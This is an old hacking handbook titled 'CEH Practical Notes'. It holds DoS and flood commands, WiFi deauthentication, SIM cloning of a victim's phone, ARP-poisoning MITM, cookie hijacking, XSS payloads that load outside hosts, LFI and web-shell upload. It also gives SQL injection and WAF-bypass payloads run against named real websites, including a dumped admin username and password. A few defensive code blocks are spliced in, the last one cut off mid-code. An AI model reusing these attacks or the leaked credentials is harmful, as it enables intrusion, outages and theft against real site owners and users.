This document contains various methods to hack or pentest web servers and web applications.
1. A person can use it as a handbook for hacking websites.
2. All contents of this handbook were searched for and taken from various other websites & blogs...
3. Use this knowledge for educational purposes only.
Root-X Security
Haxa-1 Null Lambda:X
12/31/2014
Root-X, Shadow Walker & Raghav
Hacking In Shadow
CEH Practical Notes
December 31, 2014 [HACKING IN SHADOW CEH PRACTICAL NOTES]
CONTENT
Foot-printing
Scanning/Banner Grabbing
Enumeration
Google Hacking
Information Gathering [Automated Process ]
Dos Attack D-Dos Attacks
IDS - IPS - Firewall - Antivirus - Honey-pots
Mobile Hacking
Sniffing
Social Engineering
Web-servers & Web-application Hacking
System Hacking
Malwares
Penetration testing
Buffer Overflow
Wi-Fi Hacking
6. Email Harvesting
Tools
samspade
black widow
GSA Email Spider
Email Extractor
Metasploit [ Backtrack , Kali Linux ]
msfconsole
search gather [ Search The all Information Gathering Exploits ]
use auxiliary/gather/search_email_collector
set DOMAIN <domain name>
exploit
Scanning & Banner Grabbing
1. Network Scanning
IP scanning
port scanning
Eg. First IP scanning; for IP scanning we use:
Check it out :http://120.59.128.29
I. Angry IP Scanner :
0.0.0.0-255.255.255.255 using the concept of = ping sweep , so lets start
Our Target : 120.59.128.1 - 120.59.128.255
On Ports : 80,21,443,110
Let's try to open this IP on port 80 -> it shows an ADSL modem -> to bypass this modem we try a brute-force or dictionary attack.
Eg. Top ten passwords :
admin
user
custom
manager
abc123
abc@123
password
pa55w0rd
Pa55w0Rd
admin@123
123456
passwd
admin123
user123
user@123....etc
II. Nmap/Zenmap
III. Port Scanner
IV. Network scan ( NETDISCOVER [ BT-tool ] ) :
netdiscover -i <interface> -r <target>/24 or /16 <--- subnet
netdiscover -i eth0 -r 192.168.1.0/24
1. DOS ATTACK
It is an attempt to make a machine or network resource unavailable to its intended users by consuming all the resources available to them, such as network bandwidth, all types of memory, etc...
Ping Of Death
ping -t -l 6550 google.com [ max buffer size = 65500 ]
ping bytecode.in -l 1460 -n 10000000 -w 1
Affected systems [ Solaris 2.4 , ninix , win3.11,95 ]
SYN-ATTACK
hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh
port, syn flood on router, -a <Source address>, -S<Victim addtress>]
UDP/HTTP/TCP Flooding
LOIC
HOIC
Smurf Attack
make your own packet and flood on network
pktbuilder
packETH 1.6 [ linux & windows ]
CDP Flooding [ Cisco Discovery Protocol ]
yersinia [ backtrack ]
Done on Cisco Switches & Routers
MAC Flooding [ BT ]
Flooding network switches
ARP Spoofing
Net cut [ Windows ]
ettercap [ Backtrack ]
Deauthentication Technique
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30
ath0
Where:
-0 : means Deauthentication
1 : is the number of deauths to send (you can send multiple if
you wish); 0 means send them continuously
-a : MAC address of the access point ( Router )
-c : MAC address of the client to Deauthentication; if this is
omitted then all clients are deauthenticated
ath0 : is the interface name
2. D-Dos ATTACK
HTTP ATTACK
Get-Post Methods
DNS Amplification Attack
NTP Amplification Attack
Slowloris Attack [ Used when , Firewall blocks your Ip address after some
requests ] [slowloris.pl ]
slowloris.pl -dns www.site.com -timeout 1 -cache
3. IPV6 Flooding : [ RA Flood Attack]
Victim : windows user
Advertising the IPV6 Network [ ./fake_router6 eth1 def:c0::/64 ]
cd /pentest/spoofing/thc-ipv6
Now flooding. [ ./flood_router6 eth1 ]
4. Scapy [ Packet manipulation tool ] [ Features -> capture, create, play, reply, scan, discover ]
I. scapy -> Sending a packet from scapy
send(IP(src="192.168.1.55",dst="192.168.1.1")/ICMP()/"OurPayload") -> check with wireshark.
ctrl+d
II. scapy -> Creating Our Packet & Sending Packet
L2=Ether()
L3=IP()
L4=TCP()
L2.show()
L2=Ether(src="01:23:45:67:89:ab")
L3=IP(ttl=99, dst="192.168.1.1")
del(L3.dst)
L3.dst="192.168.1.2"
L4=TCP(sport=6783, dport=22, flags="A") [ the TCP field is "flags", not "flag" ]
L4.show()
sendp(L2/L3/L4) -> To send the packet (sendp sends at layer 2, since the stack starts with Ether())
III. scapy -> Sniffing with scapy
sniff(iface="eth0", prn=lambda x:x.show()) -> show full packet detail
ctrl+c
sniff(iface="eth0", prn=lambda x:x.summary()) -> do not show full packet detail
sniff(filter="host 192.168.1.1", count=5)
a=_
a.nsummary()
a[1]
5. Hping3 [ port scanning, syn, ack, ip, others host discovery, sniffer, flooding, file transfer ]
hping3 -h "or" man hping3 [Help menu]
hping3 -S www.lpu.in -p 80 -c 2 [ -S -> SYN Request, -c -> how many time to ping ]
hping3 -S 192.168.1.38 -p ++50 -c 5 [++50 port start with 50,51,52,53]
hping3 -1 192.168.1.x --rand-dest -I eth0 [-1-> ICMP , Ping all possible ip address in random order ]
hping3 -1 192.168.1.1 --icmp-ts -c 2 [Check time stamp ]
hping3 -8 50-56 -S 8.8.8.8 [-8 -> Scaning, 50-56 -> Port, 8.8.8.8 -> google dns server]
hping -2 192.168.1.6 -p 80 -c 1 [-2 -> udp]
hping3 -F -P -U 192.168.1.38 -c 3 [-F -> FIN, -P -> PUSH, -U -> URGENT] [X-Mas Scan]
hping3 192.168.1.38 -Q -P 139 - s [-Q -> Sequence number]
hping3 -S 192.168.1.38 -a 192.168.1.254 -p 22 --flood [-S -> SYN, open ssh port, syn
flood on router, -a <Source address>, -S<Victim addtress>]
hping3 –rand-source targetIPadress –flood -S -L 0 -p 80
hping3 -2 www.lpu.in -p ++44444 -T -n [Trace Route using UDP] [ctrl+z -> If doesn't respond ]
hping3 -S www.lpu.in -p 53 -T [Trace Route using TCP]
NOTE : hping3 also works as a packet-scripting interpreter (its Tcl shell), similar to scapy.
hping3
hping send
"ip(saddr=192.168.1.55,daddr=192.168.1.38,ttl=15)+tcp(sport=6783,dport=80,flags=s)"
6. CDP - Flooding [ Cisco Discovery Protocol ] [CPU Damaging
Routers & Switches]
yersinia -G
Launch attack
CDP
flood CDP table
ok
List attacks
cancel all attacks
7. HTTP Flood Attack
ApacheBench [Tool BT]
ab -c 1000 -n 10000 http://youripaddress/
8. UDP Flood Attack
hping3 -flood-rand-source -udp -p 53 YourtargetIPaddress
*9. SYN FloodAttack
hping3 -rand-source targetIPadress -flood -S -L 0 -p 80
IDS - IPS - Firewall - Antivirus - Honeypots
1. Firewall
I. Windows Firewall [ netsh ]
netsh /?
netsh lan /?
help
firewall
help
netsh firewall set portopening tcp 445 smb enable --> To open port in my system
TCP/IP troubleshooting and interface resets :
Install the TCP/IP protocol- netsh int ipv4 install
Uninstall the TCP/IP protocol- netsh int ipv4 uninstall
Configure the Windows Advanced Firewall :
Show all firewall rules
netsh advfirewall firewall show rule name=all
Delete an inbound advanced firewall rule for port 21
netsh advfirewall firewall delete rule name=all protocol=tcp localport=21
Export Windows Advanced Firewall settings -
netsh advfirewall export "c:\advfirewall.wfw"
Perhaps the most common command you might use is the command to enable or
disable your Windows firewall, like this:
netsh firewall set opmode disable
netsh firewall set opmode enable
1. To deny all incoming connections and allow all outgoing connections :
netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound
2. To enable firewall:
netsh advfirewall set allprofiles state on
netsh firewall set opmode enable
3. To disable firewall:
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
4. Allow or Deny rules
To add a rule allowing tcp or udp incoming packets on port 80:
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN
netsh advfirewall firewall add rule name="HTTP" protocol=UDP localport=80 action=allow dir=IN
To deny tcp or udp packets on port 80:
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN
netsh advfirewall firewall add rule name="HTTP" protocol=UDP localport=80 action=block dir=IN
5. Delete a rule
To delete a rule issue the following command:
netsh advfirewall firewall delete rule name="HTTP"
6. Allow or deny incoming connections for a specific port and IP
To allow from a specific ip:
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x
To deny from a specific ip:
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x
Allow or deny a subnet
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=x.x.x.x/24
or
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=allow dir=IN remoteip=x.x.x.x-x.x.x.x
or
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN remoteip=localsubnet
2. Linux Firewall [ Iptables ]
IP Address Blocking
iptables -A INPUT -s <Ip Address> -j DROP
iptables -A INPUT -s <Ip Address> -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s <Ip Address> -p tcp --destination-port 443 -j DROP
sudo ufw deny from $ip
IP Address Allowing
iptables -D INPUT -s <Ip Address> -j DROP
sudo ufw allow from <Ip Address>
3. Honeypot
Net Tools
Hack Trapper
Mobile Hacking
1. SIM Cloning
SIM - Subscriber identity module
IMSI - International mobile subscriber identity
IMEI - International Mobile Station Equipment Identity
Esn - Electronic serial number
MIN - Mobile identification number
CDMA Sim Cloning :
1. check for usb drivers
2. attach usb
3. check for port "right click on my computer > manage > device manager > ports"
4. open cdma workshop 2.7.0 set the port > press read.[ All detail of phone will be saved ]
5. give back the victim phone to him.
7. attach reliance netconnect (http://kollam.olx.in/reliance-netconnect-zte-880-cdma-1x-iid-449181852)
> http://www.priceindia.org/broadband/reliance/zte-mg-880-data-card-price/
8. again see port.
9. open CDMA workshop v2.7.0 --> set port
10. write all sim details on zte-mg-880-data-card
Useful Apps :
FX File Explorer Plus v2.3.1.7 ROOT + All Add-Ons
Root Explorer v3.1.7 for Android 2.3 & 3.0+
SD Maid Pro v3.0.2.8 ROOT + Unlocker
SuperSU v1.93 + SuperSU Pro Key
Lucky Patcher v4.3.1.apk
SRSRoot v4.7 Android SRS RootSuperSU v1.93
Root.Explorer.v2.7
SuperSU Pro Key v1.00 ROOT FULL Android
How to root your...
HTC One (M8)
Unlock your bootloader via HTCdev.com
Download and install TWRP for the M8 from http://teamw.in/project/twrp2/225
Flash the SuperSU root zip from http://forum.xda-developers.com/showthread.php?t=1538053
Samsung Galaxy S5
Download the Odin flash utility from http://forum.xda-developers.com/showthread.php?t=2189539
Download the CF-Auto-Root package from http://forum.xda-developers.com/showthread.php?t=2696537
Extract the TAR file from the CF-Auto-Root zip. Select the TAR file as type PDA in Odin, and flash with your device in download mode (power on with home and volume down held)
Sony Xperia Z2
Unlock the bootloader of your device: http://forum.xda-developers.com/showthread.php?t=2440597
Download ClockworkMod Recovery from http://forum.xda-developers.com/showthread.php?t=2702001 and flash using fastboot
Reboot to recovery and flash the SuperSU root zip from http://forum.xda-developers.com/showthread.php?t=1538053
3. Jailbreaking iOS (Apple)
Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch (Guide)
STEP 1: Download Evasi0n7 for Mac OS X/Windows. *new version here*
STEP 2: Download your iOS 7.x.x from our download page.
STEP 3: Make sure to back up all your data on your iPhone using iTunes or iCloud before using the Evasi0n7 untethered jailbreak.
STEP 4: Launch Evasi0n7 and plug your device into the computer, then click on the "Jailbreak" button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.
STEP 7: After it is done, an Evasi0n7 app will appear on your iPhone's home screen. Tap on it.
STEP 8: Your device will be rebooted again.
STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone several times until the jailbreak is done.
STEP 10: And you are ready to go.
SOURCE : http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html
Supported Devices :
For both Mac OS X and Windows, you can now jailbreak your iOS 7.x device with one-click
Evasi0n7 jailbreak tool.
Jailbreak devices:
iPhone 5s
iPhone 5c
iPhone 5
iPhone 4S
iPhone 4
iPad 2
iPad 3
iPad 4
iPad Air
iPad mini
iPad mini 2
iPod touch 5
4. Smartphone Pentest Framework Master
Link : https://github.com/georgiaw/Smartphone-Pentest-Framework
Sniffing
1. Man In The Middle Attack Using Ettercap.
Tools :
1] wireshark
2] ettercap
3] Cain & Abel
1] Ettercap:
> vi /etc/etter.conf
> Set : ec_uid = 0
> Set : ec_gid = 0
> In the Linux section, enable the iptables redirect rule ( remove the # )
> ettercap -G [ To open ettercap in graphical mode ]
> sniff / unified sniffing / choose interface
> Hosts / scan for hosts / Host list
> add the router IP to target 1 & the rest (the victims) to target 2
> MITM / arp poisoning
> Start Sniffing
2] Wireshark:
> open wireshark
> start sniff
> Filters protocols [ http,ftp,smtp etc ] => http://wiki.wireshark.org/DisplayFilters
> http.request.method == "POST"
> tcp.port eq 25 or icmp
> ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
> tcp.window_size == 0 && tcp.flags.reset != 1
> smb || nbns || dcerpc || nbss || dns
> ip.addr == 10.43.54.65
> ip.addr != 10.43.54.65
NOTE : Analyzing Traffic Using Wireshark
Step1 : Open Wireshark
Step2 : Choose Interface and Start Sniffing
3. Man In The Middle Attack Using xplico :
Tools Need
1. Ettercap
2. Xplico
Victim Info :
Victim -> 192.168.1.21
arp -a -> aa-aa-aa-aa-aa-aa
gateway > 192.168.1.1
apt-get update
apt-get upgrade
1. ettercap -G
> sniff
> unified sniffing
> select interface
> host
> scan for host
> Host list
> default gateway add to target 1
> .21 <victim> add to target 2
> Mitm
> arp poisoning
> ok
2. In terminal -> IP Forwarding # echo 1 > /proc/sys/net/ipv4/ip_forward
3. Backtrack > Forensics > Network Forensics > xplico web gui
> http://localhost:9876/
> u : xplico P: xplico
> case
> Live acquisition
> case name : Anything > Create
> Click on your case Eg. anything
> New Session
> Session Name : xyz
> click on session xyz
> At Live :
> Interface
> lo, eth0, wlan0 ...etc
NOTE : While the victim is browsing, all of its sessions will be saved by xplico.
4. driftnet -i eth0
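Defender-side counterpart to the ARP poisoning above, as an added example that is not from the original notes: it compares two snapshots of a host's `arp -a` table (constructed Windows-format lines with constructed addresses) and flags the two symptoms an ettercap ARP-poisoning MITM leaves on the victim, a gateway whose MAC has changed and one MAC answering for several IPs.

```python
"""Detect ARP-cache poisoning symptoms from successive `arp -a` snapshots.

Added example, not code from the notes. Input lines are constructed in the
Windows `arp -a` layout; the addresses are sample values, not real hosts.
"""
import re
from collections import defaultdict

# One Windows `arp -a` entry: "  192.168.1.1    aa-aa-aa-aa-aa-aa   dynamic"
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.IGNORECASE,
)

def parse_arp_table(text):
    """Return {ip: mac} for every parsable entry, MACs lowercased."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def find_duplicate_macs(table):
    """Return {mac: [ip, ...]} for MACs that answer for more than one IP.
    A poisoner replies for the gateway and the victim with its own MAC."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_mac_changed(before, after, gateway_ip):
    """True when the gateway's MAC differs between the two snapshots."""
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    return old is not None and new is not None and old != new

def analyse(before_text, after_text, gateway_ip):
    """Return a list of alert strings; empty when nothing looks poisoned."""
    before, after = parse_arp_table(before_text), parse_arp_table(after_text)
    alerts = []
    if gateway_mac_changed(before, after, gateway_ip):
        alerts.append(f"gateway {gateway_ip} MAC changed {before[gateway_ip]} -> {after[gateway_ip]}")
    for mac, ips in find_duplicate_macs(after).items():
        alerts.append(f"MAC {mac} claims multiple IPs: {', '.join(ips)}")
    return alerts

# Constructed snapshots: a clean baseline, then the same table while poisoned.
BASELINE = """\
Interface: 192.168.1.21 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-aa-aa-aa-aa-aa     dynamic
  192.168.1.50          bb-bb-bb-bb-bb-bb     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
POISONED = """\
Interface: 192.168.1.21 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           bb-bb-bb-bb-bb-bb     dynamic
  192.168.1.50          bb-bb-bb-bb-bb-bb     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    for alert in analyse(BASELINE, POISONED, "192.168.1.1"):
        print("ALERT:", alert)
```

Run it periodically against the live `arp -a` output and keep the baseline from a known-clean moment; a static ARP entry for the gateway, or switch-side dynamic ARP inspection, is the preventive control this check only detects the absence of.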
5. Session Hijacking
Tokens = 128-256 bit AES cipher
1. Cookies
> wireshark filter : http.cookie contains "datr"
> http.cookie && ip.src==<Target ip> -----> Check For : 1012 GET / HTTP/1.1
2. <SCRIPT>alert(document.cookie);</SCRIPT> [XSS - Vulnerability]
3. Fiddler
Step 1 : Open Fiddler
Step 2 : Tick the https Decryption Check Box
Step 3 : Take Your Victim Traffic
Step 4 : Take Out Your Victim Cookies
Step 5 : Attacker replaces them with the help of the Cookies Editor add-on on Firefox.
Social Engineering
1. Human Based
2. Computer Based
1. Human Based :
> There is no patch to human stupidity.
> Social Eng is the human side of breaking into a corporate network.
1. Posing as legitimate end user.
> Give identity and asks for the sensitive information.
2. Posing as Important user.
> as VIP, CFO, CEO etc
3. Posing as Technical Support.
> calls as technical support staff and request id & password
4. Eavesdropping
> Unauthorized listening to conversations or reading of messages.
5. Shoulder Surfing
> Looking over your shoulder as you enter a password
6. Dumpster Diving
> Search for sensitive information at target company's.
> Trash-bins
> printer trash bins
> sticky notes
> phone bills
> contact information
> financial information
7. Tailgating
> An unauthorized person wearing a fake ID badge enters a secured area by closely following an authorized person through a door requiring key access.
8. Piggybacking
> I forgot my ID badge at home. Please help me.
2. Computer Based Social Engineering :
> Mail / attachments
> Trojans
> Keyloggers
> Pop-up Windows
> Phishing
> Hoaxes and chain letters
> Websites / Sweepstakes
> Spam mails
Eg. Phishing
Step1 : Creating Fake Facebook page.
Step2 : Save This page Source Code In Notepad
Web-servers & Web-application Hacking
1] SQL Injection
2] Exploiting Hidden Elements [Tool : web developer addon]
> To manipulate html elements, tags, forms etc. on a website.
> Eg: woodlandworldwide.com [vulnerable site]
3] PHP Disclosure
> look for a vulnerable site like
[http://hrithikrules.com/displayArt.php?fname=filmography/krrish2/permission.txt&dirname=main]
> now [ http://hrithikrules.com/displayArt.php?fname=index.php]
4] XSS [Cross Site Scripting] [put a JS query in the search box, URLs etc]
> http://www.hrithikrules.com/ [Put the JS in its search box; it will redirect you]
> <script>alert("hacked")</script>
--------> Beef [Tool] [Backtrack] [start the server and attach your link to your xss iframe script and send it to other users on the lan]
--------> Download beef -> upload it to a free hosting site -> get your link -> attach it to the xss ---> send anywhere in the world.
> <script iframe src=http://www.world4free.in></script>
4.1] XSS Shell
5] Lfi / Rfi [File inclusion] [Tool : wAppex]
>http://www.hrithikrules.com/displayArt.php?fname=filmography/mohenjodaro/research
.txt&dirname=main
>http://www.hrithikrules.com/displayArt.php?fname=../../../../../../../../../../../../../../etc/pass
wd
6] DNN Portal Hacking
7] Shell Uploading
> Do sql injection first find admin password for server.
> now open his website and find any page which uploads something [ multimedia uploading ]
> upload your shell [ .php,.aspx,.asp,.jsp ]
NOTE : sometimes shells are not uploaded directly, so rename their extension to any other filetype and run the " Tamper Data Firefox addon " while uploading the shell; remove the changed extension while uploading.
> eg : http://www.arenamultimedia.in/news.aspx?id=news
===========================================================
1. Sql Injection :
www.mags.edu.in/aboutus.php?id=2
www.mags.edu.in/aboutus.php?id=2' |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 1 |<--No Error
www.mags.edu.in/aboutus.php?id=2 order by 100 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 10 |<--Error
www.mags.edu.in/aboutus.php?id=2 order by 2 |<--Error + page content
SO, Directly find the vulnerable column...
www.mags.edu.in/aboutus.php?id=2 union select 1 |<--Show Nothing
www.mags.edu.in/aboutus.php?id=-2 union select 1 |<--Vulnerable column is = 1
www.mags.edu.in/aboutus.php?id=-2 union select 1,2 |<--Error
Now,
1. Find Version Of Database.
> www.mags.edu.in/aboutus.php?id=-2 union select @@version | 5.0.96-log
2. Find Database Name
> www.mags.edu.in/aboutus.php?id=-2 union select database() | magschool
3. To Find Numbers Of Tables In Database
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=database()
amaps_admin, -----> 0x616d6170735f61646d696e
campusphotos, categories, celebration, contentmanagement, courses, domains, engineering,
events
,facilities,faculty,medmain,news,pending,query_log,register_form,site_category,sites,temp
4. To Find Number of Columns In Table
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(column_name) from information_schema.columns where table_name=0x616d6170735f61646d696e
adminid ,username ,password
5. To Find Username & Password :
www.mags.edu.in/aboutus.php?id=-2 union select group_concat(adminid,0x3a,username,0x3a,password) from amaps_admin
adminid = 1
username = adminmags
password = magsmet#749$
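The reason every `id=-2 union select ...` request above works is that the application splices the `id` parameter straight into the SQL text. The mitigation the notes never show is a parameterized query with input validation. The following is an added example, not code from the notes or from any of the sites named above, using Python's built-in sqlite3 module; the `pages` and `site_admin` tables, their rows and the credential placeholder are all constructed. The vulnerable function is kept next to the fixed one so the difference in behaviour on the same input is visible.

```python
# Added example (not from the notes): the aboutus.php?id=... lookup written two ways
# against an in-memory SQLite database. All tables and rows here are constructed.
import re
import sqlite3


def make_db():
    """Build a throwaway database with a content table and a constructed admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE site_admin (adminid INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(1, "Home", "welcome"), (2, "About us", "history of the school")])
    # placeholder credential row, not a real account
    conn.execute("INSERT INTO site_admin VALUES (1, 'admin', 'PLACEHOLDER-HASH')")
    return conn


def lookup_vulnerable(conn, raw_id):
    """Builds the SQL by string concatenation: whatever arrives in ?id= becomes SQL text,
    so '-2 union select ...' turns a page lookup into a read of any other table."""
    sql = "SELECT title, body FROM pages WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Validates the type the page expects, then binds the value as a parameter.
    The driver sends the value separately from the statement text, so it is never
    parsed as SQL; the injected text is rejected before it reaches the database."""
    if not re.fullmatch(r"-?\d+", raw_id):
        raise ValueError("id must be an integer")
    return conn.execute("SELECT title, body FROM pages WHERE id=?", (int(raw_id),)).fetchall()


def is_rejected(conn, raw_id):
    """True if the hardened lookup refuses the input."""
    try:
        lookup_parameterized(conn, raw_id)
        return False
    except ValueError:
        return True


INJECTED_ID = "-2 union select username, password from site_admin"  # constructed input


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, INJECTED_ID))
    print("parameterized:", "rejected" if is_rejected(db, INJECTED_ID) else "accepted")
```

The type check matters as much as the placeholder: a numeric id bound as a string would still be harmless, but rejecting it early keeps bad input out of the logs of the database tier and gives the application a clean place to count and alert on probes.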
______________________________________________________________________________
2. SQL Injection WAF Bypass
http://www.geca.ac.in/departments/hod.php?id=14
http://www.geca.ac.in/departments/hod.php?id=14'
http://www.geca.ac.in/departments/hod.php?id=14 order by 1
http://www.geca.ac.in/departments/hod.php?id=14 order by 2
http://www.geca.ac.in/departments/hod.php?id=14 order by 3
http://www.geca.ac.in/departments/hod.php?id=14 order by 4
http://www.geca.ac.in/departments/hod.php?id=14 order by 5
http://www.geca.ac.in/departments/hod.php?id=14 order by 6
http://www.geca.ac.in/departments/hod.php?id=14 order by 7
http://www.geca.ac.in/departments/hod.php?id=14 order by 8
http://www.geca.ac.in/departments/hod.php?id=14 order by 9
-----------------------------------------------------------
www.geca.ac.in/departments/hod.php?id=14 union select 1,2,3,4,5,6,7,8,9
Not Acceptable! | An appropriate representation of the requested resource could not be found on
this server. This error was generated by Mod_Security.
So,
www.geca.ac.in/departments/hod.php?id=14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,5,6,7,8,9
Vulnerable Columns = 6,3,5
=====================================================================
www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union select*//**/1,2,3,4,@@version,6,7,8,9
Version = 5.1.57-rel12.8-log
=====================================================================
Finding Tables :
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database()
about_aurangabad
admin_login
album
assignment
login
---------------------------------------------------------------------------------------------------
Finding Tables Using Limit :
http://www.geca.ac.in/departments/hod.php?id=-14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tables*/+where+/*!table_schema*/+like+database()+limit+1,1
Limit increment like -> 1,1
1,2
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,version()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
-----------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
----------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city'
msg: Could not query:XPATH syntax error: ' :cust_address'
msg: Could not query:XPATH syntax error: ' :cust_phone'
=====================================================================
Note : I got
Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
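The `/*!12345union select*/` form in the WAF-bypass section and the `/*!concat*/` form in the error-based section above get past ModSecurity-style matching for one reason: the signature is applied to the raw request, while MySQL executes the text inside a version comment as if the comment were not there. A detector therefore has to normalize before it matches. The following is an added example, not part of the notes, written in Python: it URL-decodes each request, strips version comments while keeping their inner text, turns plain comments into whitespace, and only then applies a small set of patterns covering both the UNION-based and the error-based probes shown above. The log lines are constructed to mirror the request shapes on this page; hosts, paths and addresses are placeholders.

```python
# Added example (not part of the notes): normalize requests before matching, so the
# comment and encoding tricks shown above do not hide the injected SQL.
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the request shapes above; hosts, paths and
# addresses are placeholders, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Dec/2014:10:00:01 +0000] "GET /aboutus.php?id=2 HTTP/1.1" 200 5120
10.0.0.5 - - [31/Dec/2014:10:00:02 +0000] "GET /aboutus.php?id=2%27 HTTP/1.1" 500 312
10.0.0.5 - - [31/Dec/2014:10:00:03 +0000] "GET /aboutus.php?id=2+order+by+10 HTTP/1.1" 500 312
10.0.0.5 - - [31/Dec/2014:10:00:04 +0000] "GET /hod.php?id=-14+/**//*!12345union+select*//**/1,2,3 HTTP/1.1" 200 4100
10.0.0.5 - - [31/Dec/2014:10:00:05 +0000] "GET /recipe.php?ID=3+and+extractvalue(rand(),/*!concat*/(0x0a,version()))-- HTTP/1.1" 500 290
10.0.0.9 - - [31/Dec/2014:10:00:06 +0000] "GET /recipe.php?ID=3 HTTP/1.1" 200 7800
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
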